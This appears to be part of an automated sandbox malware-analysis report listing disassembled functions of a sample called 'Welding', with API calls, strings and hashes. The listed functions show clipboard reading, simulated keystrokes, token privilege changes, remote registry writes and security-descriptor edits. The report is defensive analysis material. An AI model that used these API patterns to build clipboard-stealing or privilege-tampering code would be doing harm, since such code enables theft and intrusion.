Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 5c0cf6a5b726b3b9d1056b409061918df0e52cabbad7b333fadc822037232fd9
Instruction ID: f6c1c72cf87582556c3bb506e30dd4c35ca6b3e41e36e2168746edc3046594ae
Opcode Fuzzy Hash: 5c0cf6a5b726b3b9d1056b409061918df0e52cabbad7b333fadc822037232fd9
Instruction Fuzzy Hash: D93110B4D00219EBCB14EF95D981AEDF7B4BF48304F50856EE515B3281EB78AA88CF54

Function 004047C5 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004047CC

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 71ef0011ee23d490173a899360af7ea7c24e062e380b4e932f743a0a61d79d8f
Instruction ID: 7262f756630040ca7ce74530f259d9fbd4c1d1e926c2ecf5b1dab467617fea08
Opcode Fuzzy Hash: 71ef0011ee23d490173a899360af7ea7c24e062e380b4e932f743a0a61d79d8f
Instruction Fuzzy Hash: 60218BB5A00245EFCB50EF55C584E9EBBB1BF88704F14C49EE905AB391C778AE50CB94

Function 00433A49 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00433A87

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 3728a65dd9ffd9e8dfd4ec93871a1274a29dbff71f41b89dfdb10f753650938b
Instruction ID: 37c6f713921330d8354988fb8ebe9f870df75047b9a4b3a4dd7359c8591afe06
Opcode Fuzzy Hash: 3728a65dd9ffd9e8dfd4ec93871a1274a29dbff71f41b89dfdb10f753650938b
Instruction Fuzzy Hash: B911487190420AAFCF05DF58E94199B7BF4EF4C304F00406AF809AB351D630EA21CBA9

Function 0043E3E7 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043E428

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30a6daa0cfb35300580b58883949daa425dc177b79cd4a227c8d843442229c51
Instruction ID: 9d0156c1deb95578d0e0d564e35a38bdb1467351a801900caf695d4b037bc9fb
Opcode Fuzzy Hash: 30a6daa0cfb35300580b58883949daa425dc177b79cd4a227c8d843442229c51
Instruction Fuzzy Hash: 59F0BE37411008BBDF005E96DC05CDF3BADEF9D334F100126FA14921A0DB3AD921ABA5

Function 004349FB Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040E753,00000000,?,0042774E,00000002,00000000,00000000,00000000,?,0040DC04,0040E753,00000004,00000000,00000000,00000000), ref: 00434A2D

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b7608d378ce2d6a9542a0b91cfc84438d1b52a69f529d32dd6babe5742c1c63c
Instruction ID: 897c4ffb9132916b6b6d2c96ea54272afcaf095344fa475f22a0f23b9794e989
Opcode Fuzzy Hash: b7608d378ce2d6a9542a0b91cfc84438d1b52a69f529d32dd6babe5742c1c63c
Instruction Fuzzy Hash: EEE0E53528422167E6203BA69C007DF364C9BC97A1F152123AC02A27D0EB2CEC0095ED

Function 00410AB5 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00411377

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 9626ed8ad5151d3366644097d90105a3bfa4a997ee11cc8af1a47f5844882bf3
Instruction ID: 912fc925f951626568874de97dd5399d70d41e09bf7d887afd23e6ce42ebb9cb
Opcode Fuzzy Hash: 9626ed8ad5151d3366644097d90105a3bfa4a997ee11cc8af1a47f5844882bf3
Instruction Fuzzy Hash: E8E09B3050430DB68B04A666EC155DE372C6E10394F50412BFD24555E2EBB8DAD5818D

Function 0043E126 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043E501,?,?,00000000,?,0043E501,00000000,0000000C), ref: 0043E143

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ce60be9a5e53405dc3f8cf63e873eba729b4601c5a64b9ca51fb6966d39c5315
Instruction ID: 3a85023de4df850b161bcf7e3046522f2a5fb8d0ddf1760a4f18ac174ff14665
Opcode Fuzzy Hash: ce60be9a5e53405dc3f8cf63e873eba729b4601c5a64b9ca51fb6966d39c5315
Instruction Fuzzy Hash: DAD06C3200014DBBDF128F84DC06EDA3BAAFB88714F014010BA1856020C732E871AB95

Non-executed Functions

Function 0013D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0013D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0013D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0013D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0013D2B8
SendMessageW.USER32 ref: 0013D2E1
_wcsncpy.LIBCMT ref: 0013D359
GetKeyState.USER32(00000011), ref: 0013D37A
GetKeyState.USER32(00000009), ref: 0013D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0013D39D
GetKeyState.USER32(00000010), ref: 0013D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0013D3D0
SendMessageW.USER32 ref: 0013D3F7
SendMessageW.USER32(?,00001030,?,0013B9BA), ref: 0013D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0013D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0013D526
SetCapture.USER32(?), ref: 0013D52F
ClientToScreen.USER32(?,?), ref: 0013D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0013D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0013D5BB
ReleaseCapture.USER32 ref: 0013D5C6
GetCursorPos.USER32(?), ref: 0013D600
ScreenToClient.USER32(?,?), ref: 0013D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 0013D669
SendMessageW.USER32 ref: 0013D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 0013D6D4
SendMessageW.USER32 ref: 0013D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0013D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0013D733
GetCursorPos.USER32(?), ref: 0013D753
ScreenToClient.USER32(?,?), ref: 0013D760
GetParent.USER32(?), ref: 0013D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 0013D7E9
SendMessageW.USER32 ref: 0013D81A
ClientToScreen.USER32(?,?), ref: 0013D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0013D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 0013D8D2
SendMessageW.USER32 ref: 0013D8F5
ClientToScreen.USER32(?,?), ref: 0013D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0013D97B

Part of subcall function 000B29AB: GetWindowLongW.USER32(?,000000EB), ref: 000B29BC

GetWindowLongW.USER32(?,000000F0), ref: 0013DA17

Strings

@GUI_DRAGID, xrefs: 0013D562
F, xrefs: 0013D8FB

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 0a995e78e385ef99bf0b09eae6d2700e2218c620d4a2ef0d8716ec07f5ce05d8
Instruction ID: d5d11d216b2d40333918113afa5984411fa81190da9dd3a296d2c3b37d5580fe
Opcode Fuzzy Hash: 0a995e78e385ef99bf0b09eae6d2700e2218c620d4a2ef0d8716ec07f5ce05d8
Instruction Fuzzy Hash: C342BD74208341AFD725CF28E848FAABBF5FF49310F140659F699872A1C771D998CB92

Function 000C5EDA Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 000C5EE2
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001010D7
IsIconic.USER32(?), ref: 001010E0
ShowWindow.USER32(?,00000009), ref: 001010ED
SetForegroundWindow.USER32(?), ref: 001010F7
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0010110D
GetCurrentThreadId.KERNEL32 ref: 00101114
GetWindowThreadProcessId.USER32(?,00000000), ref: 00101120
AttachThreadInput.USER32(?,00000000,00000001), ref: 00101131
AttachThreadInput.USER32(?,00000000,00000001), ref: 00101139
AttachThreadInput.USER32(00000000,?,00000001), ref: 00101141
SetForegroundWindow.USER32(?), ref: 00101144
MapVirtualKeyW.USER32(00000012,00000000), ref: 00101159
keybd_event.USER32(00000012,00000000), ref: 00101164
MapVirtualKeyW.USER32(00000012,00000000), ref: 0010116E
keybd_event.USER32(00000012,00000000), ref: 00101173
MapVirtualKeyW.USER32(00000012,00000000), ref: 0010117C
keybd_event.USER32(00000012,00000000), ref: 00101181
MapVirtualKeyW.USER32(00000012,00000000), ref: 0010118B
keybd_event.USER32(00000012,00000000), ref: 00101190
SetForegroundWindow.USER32(?), ref: 00101193
AttachThreadInput.USER32(?,?,00000000), ref: 001011BA

Strings

Shell_TrayWnd, xrefs: 001010D2

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 6350672a52f819a3f5768adec1df2e7cd2b8453b714bcfe528805668060d4519
Instruction ID: 7c8e04e73a1803c4bd41186902db0afa93ce2a1fc999cb30c4b15f3737043f4d
Opcode Fuzzy Hash: 6350672a52f819a3f5768adec1df2e7cd2b8453b714bcfe528805668060d4519
Instruction Fuzzy Hash: 4531A575A403187BEB212B729C49F7F3E6CEB49B50F114015FB45AA1E0CAB05D91AEA0

Function 00108F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00109399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001093E3
Part of subcall function 00109399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00109410
Part of subcall function 00109399: GetLastError.KERNEL32 ref: 0010941D

_memset.LIBCMT ref: 00108F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00108FC3
CloseHandle.KERNEL32(?), ref: 00108FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00108FEB
GetProcessWindowStation.USER32 ref: 00109004
SetProcessWindowStation.USER32(00000000), ref: 0010900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00109028

Part of subcall function 00108DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00108F27), ref: 00108DFE
Part of subcall function 00108DE9: CloseHandle.KERNEL32(?,?,00108F27), ref: 00108E10

Strings

default, xrefs: 00109023
winsta0, xrefs: 00108FE6
, xrefs: 00108F80

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 9cc8c5a34759049de6db29dd87b8ff8809322a8d6f6d5a39aee3cef3dd5573d7
Instruction ID: ea80bab06a121ea575763562bf66a4d9e3cba399700bfae4a710f6aca623aeaf
Opcode Fuzzy Hash: 9cc8c5a34759049de6db29dd87b8ff8809322a8d6f6d5a39aee3cef3dd5573d7
Instruction Fuzzy Hash: FE819D71900209FFDF119FA0CC59AEE7B79FF09314F084129F991A62A2D7B28E55DB60

Function 00124632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00140980), ref: 0012465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 0012466A
GetClipboardData.USER32(0000000D), ref: 00124672
CloseClipboard.USER32 ref: 0012467E
GlobalLock.KERNEL32(00000000), ref: 0012469A
CloseClipboard.USER32 ref: 001246A4
GlobalUnlock.KERNEL32(00000000), ref: 001246B9
IsClipboardFormatAvailable.USER32(00000001), ref: 001246C6
GetClipboardData.USER32(00000001), ref: 001246CE
GlobalLock.KERNEL32(00000000), ref: 001246DB
GlobalUnlock.KERNEL32(00000000), ref: 0012470F
CloseClipboard.USER32 ref: 0012481F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: ca53d983632d2354bb568cf3e5fb7acb3fa73989eb29f071c19edc15abff0735
Instruction ID: 19889064e40047d1541e1b920acf1766e23fc68b6aaba42ed16508e34e3a0b23
Opcode Fuzzy Hash: ca53d983632d2354bb568cf3e5fb7acb3fa73989eb29f071c19edc15abff0735
Instruction Fuzzy Hash: BE51C135204211ABD301EF61EC8AFAE77A8AF8AB10F01052DF656D31E2DF70D9558B62

Function 0011CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0011CDD0
FindClose.KERNEL32(00000000), ref: 0011CE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0011CE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0011CE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 0011CE87
__swprintf.LIBCMT ref: 0011CED3
__swprintf.LIBCMT ref: 0011CF16

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

__swprintf.LIBCMT ref: 0011CF6A

Part of subcall function 000D38C8: __woutput_l.LIBCMT ref: 000D3921

__swprintf.LIBCMT ref: 0011CFB8

Part of subcall function 000D38C8: __flsbuf.LIBCMT ref: 000D3943
Part of subcall function 000D38C8: __flsbuf.LIBCMT ref: 000D395B

__swprintf.LIBCMT ref: 0011D007
__swprintf.LIBCMT ref: 0011D056
__swprintf.LIBCMT ref: 0011D0A5

Strings

%4d, xrefs: 0011CF10
%02d, xrefs: 0011CF5E, 0011CF68, 0011CFB6, 0011D005, 0011D054, 0011D0A3
%4d%02d%02d%02d%02d%02d, xrefs: 0011CECD

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 10996710a79d121d68b013f584cbc99d301c40826ea5ed4ba77bf671b346348d
Instruction ID: a4e13219eaceb07975e09690453d70c0944845f69e3221117af9420219094bfe
Opcode Fuzzy Hash: 10996710a79d121d68b013f584cbc99d301c40826ea5ed4ba77bf671b346348d
Instruction Fuzzy Hash: E2A13DB1408305ABC714EB64C986EEFB7ECEF95704F400929F59582193EB30DA45CB62

Function 0011F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,000BDFBA,?,00000000), ref: 0011F5F9
_wcscmp.LIBCMT ref: 0011F60E
_wcscmp.LIBCMT ref: 0011F625
GetFileAttributesW.KERNEL32(?), ref: 0011F637
SetFileAttributesW.KERNEL32(?,?), ref: 0011F651
FindNextFileW.KERNEL32(00000000,?), ref: 0011F669
FindClose.KERNEL32(00000000), ref: 0011F674
FindFirstFileW.KERNEL32(*.*,?), ref: 0011F690
_wcscmp.LIBCMT ref: 0011F6B7
_wcscmp.LIBCMT ref: 0011F6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 0011F6E0
SetCurrentDirectoryW.KERNEL32(0016B578), ref: 0011F6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 0011F708
FindClose.KERNEL32(00000000), ref: 0011F715
FindClose.KERNEL32(00000000), ref: 0011F727

Strings

*.*, xrefs: 0011F68B

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 42964b281ead5da0b41153e3a4e5564029d6bd50af9ea6f43cecacd2d8d42d5a
Instruction ID: 66069fc6e95152a2a1b9e1f324f49544830a0e1f738e4933e610799ef2b7f706
Opcode Fuzzy Hash: 42964b281ead5da0b41153e3a4e5564029d6bd50af9ea6f43cecacd2d8d42d5a
Instruction Fuzzy Hash: 8131D575644219AADB25DFB5EC49EEE77ACAF09321F100179F904D31E0DB70DAC5CA60

Function 00130EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00130FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00140980,00000000,?,00000000,?,?), ref: 00131021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00131069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 001310F2
RegCloseKey.ADVAPI32(?), ref: 00131412
RegCloseKey.ADVAPI32(00000000), ref: 0013141F

Strings

REG_MULTI_SZ, xrefs: 001311DA
REG_SZ, xrefs: 00131130
REG_DWORD, xrefs: 001312E3
REG_QWORD, xrefs: 00131360
REG_BINARY, xrefs: 001313AD
REG_EXPAND_SZ, xrefs: 0013108F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 1f9f8ac41abc6561072448134232663c1e8c7fba8f0a35360ac864b98fc4bad4
Instruction ID: 1a79a11fad294a8e48bb57749d5cbd321b1a5ca971854c1b0a2063ab003cc3ff
Opcode Fuzzy Hash: 1f9f8ac41abc6561072448134232663c1e8c7fba8f0a35360ac864b98fc4bad4
Instruction Fuzzy Hash: 21026D75200601AFCB15EF25C891EAAB7E5FF89710F04895DF99A9B362CB30ED41CB91

Function 0011F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,000BDFBA,?,00000000), ref: 0011F756
_wcscmp.LIBCMT ref: 0011F76B
_wcscmp.LIBCMT ref: 0011F782

Part of subcall function 00114875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00114890

FindNextFileW.KERNEL32(00000000,?), ref: 0011F7B1
FindClose.KERNEL32(00000000), ref: 0011F7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 0011F7D8
_wcscmp.LIBCMT ref: 0011F7FF
_wcscmp.LIBCMT ref: 0011F816
SetCurrentDirectoryW.KERNEL32(?), ref: 0011F828
SetCurrentDirectoryW.KERNEL32(0016B578), ref: 0011F846
FindNextFileW.KERNEL32(00000000,00000010), ref: 0011F850
FindClose.KERNEL32(00000000), ref: 0011F85D
FindClose.KERNEL32(00000000), ref: 0011F86F

Strings

*.*, xrefs: 0011F7D3

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 725f6d7cacdbd1f5179c32ecf9bc5720ab45f9785322fed5aebf2fc054f9e68c
Instruction ID: 72f37478ad4eccd7a68b97faee0fb08a84a9a4d150280c0c822cd8c289a82683
Opcode Fuzzy Hash: 725f6d7cacdbd1f5179c32ecf9bc5720ab45f9785322fed5aebf2fc054f9e68c
Instruction Fuzzy Hash: A631D47650461ABADB24DFB5DC88AEE77AC9F09321F140179E904E21F1DB70CED6CA60

Function 001088CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00108E3C
Part of subcall function 00108E20: GetLastError.KERNEL32(?,00108900,?,?,?), ref: 00108E46
Part of subcall function 00108E20: GetProcessHeap.KERNEL32(00000008,?,?,00108900,?,?,?), ref: 00108E55
Part of subcall function 00108E20: HeapAlloc.KERNEL32(00000000,?,00108900,?,?,?), ref: 00108E5C
Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00108E73

Part of subcall function 00108EBD: GetProcessHeap.KERNEL32(00000008,00108916,00000000,00000000,?,00108916,?), ref: 00108EC9
Part of subcall function 00108EBD: HeapAlloc.KERNEL32(00000000,?,00108916,?), ref: 00108ED0
Part of subcall function 00108EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00108916,?), ref: 00108EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00108931
_memset.LIBCMT ref: 00108946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00108965
GetLengthSid.ADVAPI32(?), ref: 00108976
GetAce.ADVAPI32(?,00000000,?), ref: 001089B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001089CF
GetLengthSid.ADVAPI32(?), ref: 001089EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001089FB
HeapAlloc.KERNEL32(00000000), ref: 00108A02
